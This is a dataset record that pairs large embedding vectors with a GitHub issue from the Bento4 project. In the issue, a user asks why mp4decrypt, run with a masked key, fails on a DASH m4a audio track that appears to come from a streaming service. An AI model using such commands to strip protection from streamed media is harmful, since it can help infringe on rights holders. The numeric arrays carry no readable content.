0.009657659567892551, -0.005263525526970625, -0.001309984247200191, 0.019261403009295464, -0.007062963675707579, -0.014058532193303108, -0.004127924796193838, -0.0009443681337870657, -0.03159463033080101, -0.004414352122694254, -0.0012526988284662366, 0.009448735974729061, 0.03129809349775314, -0.0007333384710364044, -0.0010479874908924103, 0.0032501090317964554, -0.009960935451090336, -0.026755692437291145, 0.004980467725545168, 0.0008297971216961741, -0.013600248843431473, 0.030812852084636688, -0.0026250232476741076, 0.004589578602463007, -0.007750389631837606, 0.019072696566581726, -0.02113497443497181, 0.01727999933063984, -0.007689733989536762, 0.012259094044566154, -0.01382939051836729, -0.009657659567892551, -0.0029687362257391214, 0.028386643156409264, -0.004963619168847799, -0.010837065987288952, 0.003061403753235936, 0.010008111596107483, -0.013263274915516376, 0.002648611320182681, -0.011578408069908619, -0.014031575061380863, -0.008040186949074268, -0.009684616699814796, -0.01005528774112463, -0.013337409123778343, -0.004333478398621082, 0.0060655223205685616, -0.009502651169896126, -0.0008778158226050436, -0.03566526994109154, -0.011672760359942913, 0.002284680027514696, 0.005300592631101608, 0.02113497443497181, 0.007433634251356125, 0.011827767826616764, 0.006995568983256817, -0.012420841492712498, -0.012751075439155102, 0.006493478547781706, -0.04402221366763115, 0.003908892162144184, -0.00075861148070544, -0.013775474391877651, -0.0010252416832372546, 0.006530545651912689, 0.029060591012239456, -0.009880061261355877, 0.016484741121530533, 0.014772916212677956, -0.019315319135785103, -0.015433384105563164, -0.016916068270802498, -0.018627893179655075, 0.013546332716941833, -0.01727999933063984, 0.004522183910012245, -0.00797279179096222, 0.005253416020423174, -0.009340903721749783, 0.0041953194886446, -0.011248174123466015, 0.0031945083755999804, -0.012110825628042221, 0.005826271139085293, -0.025556067004799843, -0.024652978405356407, 0.029114507138729095, -0.002958626952022314, -0.016579093411564827, 0.014543774537742138, 0.01738782972097397, 0.0017910138703882694, -0.017886551097035408, 0.023251168429851532, -0.0005256785661913455, -0.007966052740812302, -0.01759001426398754, 0.0010067082475870848, 0.01002832967787981, -0.01630951464176178, 0.004727737512439489, 0.02246939018368721, -0.005074820015579462, -0.005580280441790819, -0.01190190203487873, -0.020676691085100174, -0.0027345395646989346, -0.0006453041569329798, 0.01612081006169319, 0.022011106833815575, -0.02745659649372101, -0.006594570353627205, -0.012562369927763939, -0.020568858832120895, -0.005421902984380722, -0.010594445280730724, -0.0049973162822425365, -0.004040311556309462, 0.005731918383389711, 0.008956754580140114, 0.029869327321648598, -0.003103525610640645, -0.0017118251416832209, -0.00566452369093895, -0.02666134014725685, -0.019490543752908707, 0.012751075439155102, 0.0012872385559603572, 0.008761310018599033, -0.014179842546582222, -0.009907019324600697, 0.002325116889551282, -0.0030782525427639484, 0.00858608353883028, 0.004943400621414185, -0.018007861450314522, 0.001104430528357625, -0.01337110623717308, 0.009233072400093079, -0.008720872923731804, 0.030273694545030594, 0.028278812766075134, -0.003199562896043062, 0.0074066766537725925, 0.009340903721749783, 0.01756305620074272, 0.01178733166307211, 0.023210732266306877, -0.007319063413888216, -0.0041582523845136166, 0.029168421402573586, 0.013950700871646404, 0.016471263021230698, -0.009421777911484241, -0.0023015285842120647, -0.01368786208331585, 0.005849859211593866, 0.009145459160208702, 0.00004799239104613662, -0.006341840606182814, 0.005644305143505335, 0.014152885414659977, -0.01192886009812355, -0.010648361407220364, -0.0062272693030536175, -0.01950402371585369, 0.005691481754183769, 0.02685004472732544, 0.011160560883581638, 0.002953572431579232, -0.0010639936663210392, 0.01683519408106804, -0.007703213021159172, 0.0172260832041502, -0.014206800609827042, -0.012670202180743217, -0.004387394525110722, -0.00044101400999352336, 0.010574227198958397, 0.014031575061380863, 0.016929546371102333, -0.02790140174329281, 0.018600935116410255, -0.0035180028062313795, -0.015541215427219868, -0.024814724922180176, -0.00690795574337244, 0.0045659905299544334, 0.0053983149118721485, 0.0011954132933169603, -0.03226857632398605, -0.012104086577892303, -0.022617658600211143, -0.0056712632067501545, -0.005522994790226221, 0.0026317627634853125, 0.007244929205626249, 0.01342502236366272, 0.010520311072468758, -0.01260954700410366, -0.0052770040929317474, -0.025623461231589317, -0.01070901658385992, -0.012232135981321335, -0.00620705122128129, 0.014543774537742138, -0.028871886432170868, -0.01489422656595707, -0.022927673533558846, 0.005300592631101608, -0.004016723483800888, -0.005024274345487356, 0.004586208611726761, -0.025609983131289482, -0.0006116068107075989, -0.007325802929699421, -0.007399937137961388, -0.005620717070996761, -0.0119962552562356, 0.016552135348320007, 0.009300467558205128, -0.0034640871454030275, 0.0010521996300667524, -0.017549578100442886, -0.020730607211589813, 0.00034813571255654097, -0.0033697346225380898, -0.014112448319792747, -0.010008111596107483, -0.021930232644081116, -0.013755256310105324, -0.003266957588493824, -0.017657408490777016, 0.007871699519455433, 0.0117738526314497, 0.01359350886195898, -0.007157315965741873, 0.006874258629977703, -0.017576536163687706, 0.0023166926112025976, -0.029006674885749817, 0.016107331961393356, 0.0070764427073299885, -0.006200311705470085, 0.00043722306145355105, 0.00220886105671525, -0.013168922625482082, -0.02236155793070793, -0.01825048215687275, -0.026230012997984886, -0.006688923109322786, -0.02632436715066433, -0.0005433696787804365, 0.0008083150605671108, 0.042647361755371094, -0.012778033502399921, 0.011045989580452442, 0.01727999933063984, 0.02157977968454361, -0.00764929736033082, -0.016026457771658897, 0.022011106833815575, 0.00009919655713019893, -0.020568858832120895, -0.0023487049620598555, -0.015770357102155685, -0.016457783058285713, 0.0045491415075957775, 0.001626739394851029, -0.0035415911115705967, -0.020892353728413582, -0.010998813435435295, 0.0022105458192527294, 0.000571170006878674, -0.03469478711485863, -0.00036098281270824373, 0.00382464868016541, 0.03388604894280434, 0.0029502026736736298, -0.004606427159160376, 0.0021566301584243774, 0.008276067674160004, -0.007244929205626249, 0.0054421210661530495, 0.011113384738564491, 0.0060655223205685616, 0.03326601907610893, 0.00742689473554492, -0.01591862551867962, -0.023844242095947266, 0.016821714118123055, -0.01318914070725441, -0.00524330697953701, -0.0011372853768989444, -0.008518689312040806, 0.010338345542550087, -0.0031810293439775705, -0.0037302961573004723, 0.029438000172376633, -0.012299531139433384, -0.03369734436273575, -0.00797279179096222, -0.00009867003973340616, 0.029869327321648598, 0.009907019324600697, 0.0010193446651101112, -0.012279313057661057, -0.0034017469733953476, -0.01625559851527214, -0.00371344736777246, -0.010580966249108315, 0.007588642183691263, -0.0035853974986821413, -0.012326489202678204, -0.030974600464105606, -0.00814127828925848, 0.02962670661509037, -0.005543213337659836, 0.0022122308146208525, -0.009111762046813965, -0.007999749854207039, 0.006591200828552246, 0.004249235149472952, -0.017926987260580063, -0.01969272829592228, 0.0272409338504076, -0.0007729328353889287, -0.026445677503943443, 0.0010126052657142282, 0.01861441321671009, -0.0010387207148596644, 0.014826832339167595, -0.0030782525427639484, 0.011544710956513882, 0.0035247423220425844, 0.02954583242535591, 0.033832136541604996, -0.010493353009223938, 0.015932105481624603, 0.009691356681287289, -0.014139406383037567, -0.005432012025266886, -0.007346021477133036, 0.002559313317760825, 0.01529859472066164, 0.003494414733722806, -0.0014380342327058315, -0.006217160262167454, 0.00330739445053041, 0.01368786208331585, 0.01825048215687275, -0.012521933764219284, 0.0008929796749725938, -0.024814724922180176, 0.015716440975666046, 0.008707393892109394, -0.0209193117916584, 0.0066754440777003765, -0.008478252217173576, -0.014260716736316681, -0.006779905874282122, 0.006988829467445612, -0.02726789191365242, -0.014638126827776432, -0.021808922290802002, 0.008174976333975792, -0.003007488092407584, 0.0016149452421814203, -0.017522620037198067, 0.016579093411564827, -0.006560873240232468, -0.010533790104091167, -0.014152885414659977, 0.0053342897444963455, -0.015554694458842278, 0.023264646530151367, -0.025758251547813416, -0.0012392199132591486, -0.015527736395597458, -0.0007796723512001336, 0.022981589660048485, 0.02094626985490322, -0.00018280810036230832, 0.001553447567857802, -0.014611168764531612, -0.013512635603547096, 0.0029990638140589, 0.004609796684235334, -0.00030180186149664223, 0.011976036243140697, -0.007757128681987524, -0.02052842266857624, 0.009684616699814796, 0.0008795007015578449, -0.023251168429851532, -0.010378782637417316, 0.0033747891429811716, -0.042566485702991486, 0.019989265128970146, 0.003598876530304551, -0.012798251584172249, -0.009677877649664879, -0.0041582523845136166, -0.026647860184311867, -0.01389678567647934, 0.02598739229142666, -0.002372293034568429, -0.0002624180633574724, 0.015514257363975048, -0.00608237087726593, 0.008235631510615349, 0.009037627838551998, -0.013162183575332165, -0.010399000719189644, 0.014678563922643661, -0.01958489790558815, -0.00001659857480262872, -0.024316003546118736, -0.006661965046077967, -0.007770607713609934, 0.01994882896542549, 0.03275382146239281, 0.0243025254458189, 0.004683930892497301, 0.008383899927139282, -0.026108702644705772, 0.0020049919839948416, 0.008464773185551167, -0.004313260316848755, 0.014678563922643661, -0.009401559829711914, -0.006250857375562191, -0.011086426675319672, 0.0028726987075060606, -0.017819156870245934, 0.01192886009812355, 0.030354568734765053, -0.003199562896043062, 0.009212854318320751, -0.015770357102155685, -0.0031742898281663656, -0.0031759748235344887, -0.026971355080604553, 0.009516130201518536, -0.007062963675707579, 0.03078589402139187, 0.001285553677007556, -0.006473260000348091, -0.016026457771658897, 0.011356005445122719, -0.015002057887613773, -0.020407112315297127, -0.0015526051865890622, -0.00015658735355827957, 0.016349952667951584, -0.009502651169896126, -0.00046375973033718765, 0.0011229640804231167, 0.018210045993328094, -0.01128861028701067, 0.0023992510978132486, 0.004828829783946276, -0.00032854912569746375, 0.018803119659423828, -0.005529734306037426, 0.009408298879861832, -0.0035955067723989487, -0.014826832339167595, -0.006982089951634407, -0.002604804700240493, -0.01950402371585369, 0.004026832990348339, -0.013101527467370033, 0.004795132204890251, -0.008451294153928757, 0.016053415834903717, 0.030111948028206825, 0.0025492042768746614, -0.03442520648241043, -0.0071236188523471355, 0.011052729561924934, 0.007918876595795155, -0.012676941230893135, 0.011922121047973633, 0.012589327991008759, 0.006274445913732052, -0.007197753060609102, 0.010567487217485905, -0.01051357202231884, -0.006031824741512537, -0.031945083290338516, -0.0027008422184735537, 0.012852167710661888, -0.01006876677274704, -0.002709266496822238, 0.011079687625169754, 0.018910950049757957, 0.00009161466005025432, 0.005829640664160252, -0.00650358758866787, -0.030084989964962006, -0.007224710658192635, -0.008060405030846596, -0.0019561308436095715, -0.008835444226861, -0.02288723737001419, 0.017603492364287376, -0.00048229325329884887, 0.0005391575396060944, -0.005492667201906443, -0.009691356681287289, -0.008606301620602608, 0.0022712009958922863, -0.006695662625133991, -0.009502651169896126, -0.002202121540904045, 0.002102714264765382, -0.007474071346223354, 0.022792885079979897, 0.02197066880762577, -0.0033057096879929304, 0.010412479750812054, 0.004478377290070057, 0.01029116939753294, 0.0007493447046726942, -0.014085490256547928, -0.01919400878250599, 0.016026457771658897, 0.00863999966531992, 0.003679750021547079, -0.0025087674148380756, -0.029330169782042503, 0.0015433384105563164, -0.015824273228645325, -0.0067933849059045315, 0.012427580542862415, 0.0052298279479146, 0.009313946589827538, 0.032079871743917465, 0.011591887101531029, 0.008282807655632496, -0.03075893595814705, 0.025515630841255188, -0.001115382183343172, -0.017266519367694855, -0.005374726373702288, -0.0074605923146009445, 0.01151101291179657, 0.008269328624010086, 0.007083182223141193, -0.019234444946050644, 0.012454538606107235, 0.009684616699814796, -0.002997378818690777, 0.003101840615272522, 0.0017286738147959113, 0.014597689732909203, 0.003915631677955389, 0.015082932077348232, 0.012393883429467678, -0.01719912514090538, -0.006176723632961512, 0.0020808111876249313, -0.0028036192525178194, -0.007541466038674116, -0.003639313392341137, -0.017509140074253082, 0.021310200914740562, 0.002277940511703491, 0.013061091303825378, -0.019787080585956573, 0.008619780652225018, 0.03345472365617752, -0.025151697918772697, -0.02346683107316494, -0.0083906389772892, -0.00012552260886877775, 0.006220529787242413, 0.011713197454810143, 0.022307641804218292, -0.005522994790226221, 0.011821028776466846, 0.0017151948995888233, -0.009967674501240253, -0.00819519441574812, -0.005320810712873936, 0.006897846702486277, -0.006709141656756401, -0.013243056833744049, 0.0036898592952638865, 0.012852167710661888, -0.009064585901796818, 0.009300467558205128, -0.008963493630290031, 0.02000274509191513, -0.00008608618372818455, 0.014476379379630089, -0.005910514388233423, -0.014072011224925518, -0.015419905073940754, -0.03504524007439613, -0.005903774872422218, 0.012831948697566986, 0.012838688679039478, 0.020016223192214966, 0.000852542812936008, -0.022091979160904884, 0.008646738715469837, 0.005522994790226221, 0.012286052107810974, -0.004357066936790943, -0.004272823221981525, -0.008687175810337067, 0.005876816809177399, 0.012016473338007927, 0.0003030654916074127, 0.019854476675391197, 0.01190190203487873, -0.015770357102155685, -0.010877503082156181, -0.044480495154857635, 0.005634196102619171, 0.009421777911484241, -0.0008643369073979557, -0.01029116939753294, -0.0122186578810215, -0.031998999416828156, 0.014624647796154022, 0.011059468612074852, -0.013445240445435047, -0.007069703191518784, 0.018951386213302612, -0.006547394208610058, -0.03251119703054428, -0.006052043288946152, 0.01733391359448433, 0.013505895622074604, 0.012279313057661057, -0.023979030549526215, 0.008296286687254906, 0.003186084097251296, -0.009549827314913273, 0.004340217914432287, -0.008983712643384933, 0.02255026437342167, 0.0026789389085024595, -0.005930732935667038, -0.005667893681675196, -0.014826832339167595, -0.03461391478776932, 0.013283493928611279, -0.007709952536970377, -0.004245865624397993, 0.01237366534769535, -0.016296036541461945, 0.0197196863591671, -0.00925329141318798, 0.0013268329203128815, -0.014921184629201889, 0.016983462497591972, -0.015581652522087097, -0.004387394525110722, 0.009752011857926846, -0.0012147893430665135, 0.01388330664485693, -0.022240247577428818, -0.00619357218965888, -0.00862652063369751, -0.004471637774258852, 0.03528786078095436, -0.014489858411252499, 0.009940716437995434, 0.00016532759764231741, -0.012333228252828121, -0.0276857390999794, -0.004640124272555113, -0.0020285802893340588, -0.03531481698155403, -0.006500218063592911, -0.00742689473554492, 0.012211917899549007, -0.004990576766431332, 0.005405054427683353, -0.016161246225237846, 0.0036629014648497105, 0.01529859472066164, -0.021323680877685547, 0.0011912011541426182, -0.007730171084403992, 0.021755006164312363, -0.0011229640804231167, -0.015446863137185574, -0.01364742498844862, 0.00714383739978075, -0.009981153532862663, -0.00763581832870841, -0.014948142692446709, -0.0269309189170599, 0.0027143212500959635, -0.02199762687087059, -0.0025256159715354443, -0.0231029000133276, 0.019867954775691032, 0.012818470597267151, 0.020407112315297127, 0.015163805335760117, 0.017913509160280228, -0.009361122734844685, -0.012211917899549007, 0.017953945323824883, 0.005715069826692343, 0.004340217914432287, 0.012602807022631168, 0.00018638843903318048, -0.007885178551077843, 0.006166614126414061, 0.006870888639241457, 0.0014245553174987435, 0.020326238125562668, -0.0011768797412514687, 0.011443618685007095, 0.001599781448021531, 0.0014599375426769257, -0.0032433695159852505, 0.01594558358192444, 0.014651605859398842, 0.004377285018563271, 0.007083182223141193, 0.011571668088436127, 0.005041122902184725, 0.002840686123818159, 0.008673696778714657, 0.01532555278390646, 0.002240873407572508, -0.00010735763498814777, -0.002820467809215188, 0.0077975657768547535, 0.018735723569989204, 0.016552135348320007, -0.010021590627729893, 0.023035505786538124, 0.008289546705782413, -0.02050146460533142, 0.012104086577892303, -0.020151011645793915, 0.0021566301584243774, 0.025448234751820564, -0.02884492836892605, 0.00382464868016541, 0.01583775319159031, 0.003605616046115756, 0.006756317801773548, -0.01955793984234333, 0.0012215287424623966, 0.004744586069136858, 0.017077814787626266, -0.03911587968468666, -0.020892353728413582, -0.024154257029294968, -0.001774165197275579, -0.012002994306385517, -0.009158938191831112, -0.005785834044218063, -0.02241547405719757, -0.0006705771666020155, 0.000018007018297794275, 0.0012484866892918944, -0.0016098907217383385, 0.021283242851495743, 0.016296036541461945, 0.010452916845679283, 0.015473821200430393, 0.023507267236709595, -0.0059543210081756115, 0.02477428875863552, -0.007332542445510626, 0.01536598987877369, -0.0052871135994791985, -0.022954631596803665, -0.003020967124029994, 0.0014978470280766487, -0.01667344570159912, -0.010890982113778591, 0.005148954223841429, -0.018708765506744385, 0.007777347229421139, 0.01022377423942089, 0.014085490256547928, -0.010102463886141777, 0.005101778078824282, -0.023898158222436905, 0.0005046177539043128, 0.00430652080103755, 0.009185896255075932, 0.01025073230266571, 0.0018061776645481586, -0.0072314501740038395, 0.005098408553749323, 0.01780567690730095, 0.01686215214431286, 0.005522994790226221, 0.033158186823129654, -0.006089110393077135, 0.009738532826304436, -0.019342275336384773, -0.007487550377845764, -0.017886551097035408, 0.017994383350014687, 0.0013554757460951805, 0.01048661395907402, -0.017347393557429314, -0.002352074719965458, 0.007723431568592787, 0.016889110207557678, -0.018520060926675797, -0.023062463849782944, 0.018816597759723663, -0.004080748651176691, -0.010641621425747871, -0.006298033986240625, -0.0038954131305217743, 0.013115006498992443, 0.00288786250166595, -0.014328110963106155, 0.01636343076825142, -0.005543213337659836, -0.004363806452602148, 0.0061194379813969135, 0.030031073838472366, 0.014125927351415157, 0.02207850106060505, -0.02157977968454361, 0.0034977844916284084, 0.01527163665741682, -0.005428642500191927, -0.009192636236548424, -0.02388467825949192, -0.008680435828864574, 0.01260954700410366, 0.008923057466745377, 0.012838688679039478, 0.02410034090280533, -0.006587830837816, -0.006385646760463715, 0.012070389464497566, 0.0044177221134305, 0.0029198750853538513, 0.007137097883969545, 0.005681372247636318, 0.005425272509455681, -0.007372979074716568, 0.0033933226950466633, -0.013101527467370033, -0.016848672181367874, 0.014139406383037567, 0.0005926520680077374, 0.0019173789769411087, 0.015177284367382526, 0.019355755299329758, 0.004791762679815292, 0.026351323351264, 0.005576910451054573, -0.011922121047973633, 0.011531231924891472, 0.0048861149698495865, 0.01994882896542549, 0.021728048101067543, 0.006547394208610058, -0.009064585901796818, -0.014166364446282387, 0.006196941714733839, 0.00451544439420104, -0.0023335411678999662, 0.02585260383784771, 0.0035517001524567604, -0.01661953143775463, 0.011605366133153439, 0.0005766458343714476, 0.014934663660824299, 0.005613977555185556, -0.000863494467921555, -0.0032989701721817255, -0.024679936468601227, 0.02383076213300228, 0.02734876610338688, -0.009361122734844685, 0.009037627838551998, -0.009098283015191555, 0.002842371119186282, -0.01345198042690754, -0.014382027089595795, 0.0172260832041502, -0.002869328949600458, -0.004656973294913769, 0.007669515907764435, -0.004225647076964378, 0.007447113282978535, 0.003804430365562439, -0.006941653322428465, -0.010870764032006264, 0.017900029197335243, 0.02327812649309635, -0.03423650190234184, -0.002655350835993886, 0.00863999966531992, -0.03132505342364311, -0.011194257996976376, 0.015244678594172001, 0.0013891730923205614, -0.0021549451630562544, -0.005192760843783617, 0.0063384706154465675, -0.007804305292665958, 0.010446176864206791, -0.012339968234300613, -0.02493603527545929, -0.014476379379630089, -0.01486726850271225, -0.014045053161680698, -0.024599062278866768, -0.00795931275933981, 0.027470076456665993, -0.011207737028598785, 0.02374988980591297, -0.02740268036723137, -0.0021077690180391073, -0.005179281812161207, 0.004963619168847799, 0.008188455365598202, -0.00409759720787406, -0.005428642500191927, 0.0001999726810026914, -0.030947642400860786, 0.0036494224332273006, 0.007285366300493479, 0.018910950049757957, -0.0009207799448631704, 0.010675319470465183, 0.002340280683711171, 0.003012542612850666, -0.013276753947138786, -0.004127924796193838, -0.003932480234652758, 0.0032096721697598696, 0.01730695739388466, -0.0028861777391284704, -0.0007880966877564788, -0.003152386751025915, -0.007217971608042717, 0.01005528774112463, 0.011672760359942913, -0.010243993252515793, 0.0057184393517673016, -0.006682183593511581, 0.0028019342571496964, -0.011780591681599617, -0.013519374653697014, -0.028359685093164444, 0.002550889039412141, 0.004636754747480154, -0.006901216227561235, 0.0072314501740038395, -0.020434070378541946, 0.01738782972097397, -0.0013975973706692457, -0.005573540925979614, 0.023089421913027763, 0.005189391318708658, 0.00903088878840208, 0.00985984317958355, -0.011895162984728813, 0.00515906373038888, -0.0006987986853346229, -0.017495661973953247, -0.01217822078615427, 0.0015323867555707693, -0.03280773386359215, -0.005469079129397869, -0.0034017469733953476, -0.008073884062469006, -0.005108517594635487, -0.0032282057218253613, -0.013782214373350143, -0.0004132137109991163, 0.022954631596803665, -0.0046030571684241295, -0.001186989014968276, 0.01030464842915535, -0.028575349599123, -0.0005442121182568371, 0.01219169981777668, 0.021067580208182335, 0.01641734689474106, -0.01827744022011757, 0.010715755634009838, -0.02100018598139286, 0.0001591146574355662, 0.00036561620072461665, -0.001747207366861403, -0.0142876747995615, 0.0029552571941167116, -0.029357127845287323, -0.02286027930676937, 0.009003930725157261, 0.011389702558517456, -0.0001521645754110068, 0.010890982113778591, -0.0008365365792997181, -0.007656036876142025, 0.005876816809177399, 0.009428516961634159, 0.006301403511315584, 0.0005614820402115583, -0.022159375250339508, 0.02286027930676937, -0.002139781368896365, -0.005182651802897453, -0.018425708636641502, 0.041676875203847885, -0.005186021327972412, 0.0018196566961705685, 0.012461278587579727, 0.0038414974696934223, -0.00282552232965827, -0.013303712010383606, -0.022011106833815575, 0.009233072400093079, 0.009091543965041637, 0.0018044929020106792, 0.002043744083493948, -0.0004045787500217557, -0.01756305620074272, 0.009381340816617012, 0.000993229215964675, -0.00016101013170555234, -0.005853228736668825, -0.002001622226089239, -0.01992187090218067, -0.024032946676015854, -0.009644180536270142, 0.019342275336384773, -0.020514944568276405, -0.00246833055280149, -0.011652542278170586, 0.010243993252515793, 0.0086130416020751, 0.0021094537805765867, -0.007527987007051706, 0.0373905748128891, -0.010830326937139034, -0.00035487517016008496, -0.004747956059873104, -0.0041953194886446, 0.010864024050533772, 0.008923057466745377, 0.011409921571612358, -0.01030464842915535, 0.007447113282978535, 0.001993197947740555, 0.0027732914313673973, -0.010035069659352303, -0.0019342276500537992, 0.0077436501160264015, -0.0136204669252038, -0.00167812779545784, -0.0032989701721817255, -0.009684616699814796, 0.016538657248020172, 0.0158916674554348, 0.015554694458842278, -0.02616261877119541, 0.003344461554661393, -0.010203556157648563, 0.0003142277419101447, 0.013222838751971722, -0.010621403343975544, 0.0018836816307157278, -0.009785708971321583, -0.011086426675319672, -0.00926677044481039, -0.008276067674160004, 0.0011987830512225628, -0.021647173911333084, -0.002222339855507016, 0.006887737195938826, 0.0019628703594207764, -0.01444942131638527, 0.03439825028181076, -0.003117004409432411, 0.000769984326325357, -0.011079687625169754, -0.014179842546582222, -0.0062811849638819695, -0.023426394909620285, 0.01002832967787981, 0.000007897815521573648, 0.009853104129433632, 0.0015669265994802117, 0.007770607713609934, -0.018600935116410255, -0.0020184710156172514, -0.007366239558905363, -0.0023908265866339207, -0.006554133724421263, -0.01777871884405613, -0.0022931043058633804, -0.026540029793977737, 0.015460342168807983, -0.00014542510325554758, 0.008309765718877316, -0.02238851599395275, -0.017765240743756294, 0.003922371193766594, 0.00439076405018568, -0.0011305459775030613, -0.01827744022011757, 0.0035685489419847727, 0.009853104129433632, 0.01069553755223751, -0.00661478890106082, -0.03248424082994461, 0.002240873407572508, 0.01617472618818283, 0.005418532993644476, 0.011989515274763107, 0.0016857096925377846, -0.008478252217173576, 0.005893665831536055, 0.01022377423942089, -0.005179281812161207, -0.01711825095117092, 0.009718314744532108, 0.0172260832041502, 0.009010669775307178, -0.009401559829711914, 0.007029266096651554, 0.011632323265075684, -0.005603868514299393, 0.009381340816617012, -0.009179157204926014, 0.038711510598659515, 0.015851231291890144, 0.018048297613859177, -0.012454538606107235, -0.009408298879861832, 0.02632436715066433, 0.011908642016351223, 0.010425958782434464, 0.0044413101859390736, -0.004252605140209198, 0.023507267236709595, -0.0009393134969286621, -0.020070139318704605, 0.021701090037822723, -0.01919400878250599, 0.015716440975666046, 0.017468703910708427, 0.0004957721685059369, 0.019544459879398346, 0.025758251547813416, -0.010324866510927677, 0.0167812779545784, -0.009327425621449947, 0.01861441321671009, 0.012110825628042221, 0.031055472791194916, -0.016606051474809647, -0.02643219754099846, 0.015177284367382526, 0.009981153532862663, 0.018654851242899895, 0.0036224646028131247, -0.006874258629977703, 0.004269453696906567, 0.007150576915591955, 0.006321622058749199, -0.007608860731124878, -0.002394196344539523, -0.003101840615272522, -0.004178470931947231, 0.001197940669953823, 0.014975100755691528, 0.0010858969762921333, -0.0033680496271699667, 0.009084803983569145, -0.00043680184171535075, 0.012845427729189396, -0.009698095731437206, -0.011140342801809311, 0.016875630244612694, -0.006264336407184601, -0.01381591148674488, 0.011012292467057705, -0.011200997978448868, 0.019463587552309036, -0.015797315165400505, 0.023318562656641006, 0.010864024050533772, 0.015743399038910866, -0.006217160262167454, -0.015851231291890144, 0.021808922290802002, 0.04205428808927536, 0.006483369041234255, -0.00525678601115942, 0.007049484644085169, 0.012730857357382774, -0.00903088878840208, -0.011544710956513882, -0.005374726373702288, 0.0032484240364283323, 0.00334277655929327, -0.004107706248760223, 0.016039935871958733, 0.0013184086419641972, -0.002683993661776185, 0.038738466799259186, -0.028036192059516907, -0.01430115383118391, -0.014745958149433136, -0.010574227198958397, 0.025690855458378792 ]
3,045
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
I am trying to decrypt an audio file in .m4a format I am using the correct key, but the file is not being decrypted. The same file in .aac format is decrypted using the same key, but as I said, it doesn't work in m4a format. "audio578956 m4a audio only [pt] DASH audio 128k , m4a_dash container, mp4a.40.2 (48000Hz)" "mp4decrypt --key faxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:85xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx "test.m4a" "decrypt.aac" or "mp4decrypt --key faxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:85xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx "test.m4a" "decrypt.m4a" Either way, the m4a file is not decrypted. Is there any solution?
mp4decrypt does not work with m4a audio files?
https://api.github.com/repos/axiomatic-systems/Bento4/issues/589/comments
7
2021-03-11T07:39:52
2024-04-09T15:11:14Z
https://github.com/axiomatic-systems/Bento4/issues/589
828,878,121
589
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : mp4decrypt does not work with m4a audio files? Issue date: --- start body --- I am trying to decrypt an audio file in .m4a format I am using the correct key, but the file is not being decrypted. The same file in .aac format is decrypted using the same key, but as I said, it doesn't work in m4a format. "audio578956 m4a audio only [pt] DASH audio 128k , m4a_dash container, mp4a.40.2 (48000Hz)" "mp4decrypt --key faxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:85xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx "test.m4a" "decrypt.aac" or "mp4decrypt --key faxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:85xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx "test.m4a" "decrypt.m4a" Either way, the m4a file is not decrypted. Is there any solution? --- end body ---
809
[ -0.024405628442764282, 0.014407827518880367, -0.011600852943956852, 0.0005291703273542225, -0.029391443356871605, -0.01413301844149828, -0.028475414961576462, 0.02406539022922516, -0.02884182706475258, 0.04786905646324158, 0.0020152637735009193, 0.006098135840147734, -0.02449723146855831, 0.02693125233054161, -0.005836413241922855, -0.02335873804986477, -0.008754619397222996, -0.002605775371193886, -0.047659680247306824, 0.003929109778255224, -0.0027726234402507544, -0.007112310733646154, 0.03632709011435509, 0.0035692413803189993, -0.006264983676373959, 0.011934548616409302, -0.01601742021739483, -0.0038833084981888533, -0.03200867027044296, -0.00791710801422596, 0.00855832826346159, 0.0022066484671086073, -0.037400152534246445, 0.015467803925275803, 0.04313187673687935, 0.020820029079914093, 0.004396939184516668, 0.03705991432070732, 0.004462369717657566, 0.007419834844768047, -0.02432711236178875, -0.04033144563436508, -0.016292229294776917, 0.017352206632494926, -0.014355482533574104, 0.012013065628707409, 0.0036281291395425797, 0.026826562359929085, -0.046508099883794785, -0.007550695911049843, -0.013282420113682747, -0.0029509218875318766, -0.0504077672958374, -0.025112280622124672, 0.022534312680363655, -0.023070843890309334, 0.0026499410159885883, -0.012242073193192482, -0.0010280789574608207, 0.006615038029849529, -0.037347808480262756, 0.013622659258544445, 0.05893992260098457, 0.05558987334370613, 0.01672407239675522, 0.0005369401769712567, 0.00376553344540298, 0.029757855460047722, -0.023856012150645256, 0.02538708783686161, -0.008355492725968361, 0.005640121176838875, 0.0023178805131465197, 0.011685912497341633, 0.0010804234771057963, -0.0420064702630043, 0.04841867461800575, 0.03860407695174217, -0.015899645164608955, 0.051637861877679825, -0.05422891676425934, 0.008113399147987366, -0.06668690592050552, 0.012896379455924034, 0.020492875948548317, 0.009579045698046684, -0.08369887620210648, -0.04020058736205101, -0.03562043979763985, -0.00021489875507541, 0.0012284602271392941, -0.0032224589958786964, 0.020571393892169, 0.00817883014678955, 0.02449723146855831, -0.008767706342041492, -0.014604118652641773, 0.0036412151530385017, -0.05501408129930496, -0.059253986924886703, -0.026250774040818214, -0.0035921421367675066, -0.020335843786597252, 0.013478712178766727, 0.022547399625182152, -0.02529548667371273, 0.012987982481718063, -0.029182065278291702, 0.03821149468421936, 0.09348729997873306, -0.007086138240993023, 0.015637923032045364, 0.024693524464964867, -0.03912752494215965, -0.001589964609593153, 0.0068178726360201836, -0.008218088187277317, -0.050355419516563416, -0.038420870900154114, 0.014996702782809734, -0.008754619397222996, -0.038630250841379166, -0.0218930933624506, 0.0371646024286747, -0.012111211195588112, 0.06605877727270126, 0.007969452068209648, 0.009775337763130665, -0.017666272819042206, -0.012157012708485126, -0.045356519520282745, 0.012543054297566414, 0.007491808384656906, -0.008139572106301785, 0.00343838008120656, 0.009893112815916538, -0.048628050833940506, 0.0236597191542387, -0.009166833013296127, -0.005427471827715635, -0.024209337309002876, -0.018477613106369972, 0.008257347159087658, 0.0008579592686146498, -0.034076277166604996, -0.009585589170455933, 0.020244240760803223, 0.01702505350112915, -0.00021101381571497768, 0.0473194383084774, -0.01663246937096119, -0.015035961754620075, 0.04075020179152489, -0.005237722769379616, 0.013727348297834396, 0.02259974367916584, -0.018202804028987885, -0.0014378383057191968, -0.009291150607168674, 0.00982113927602768, 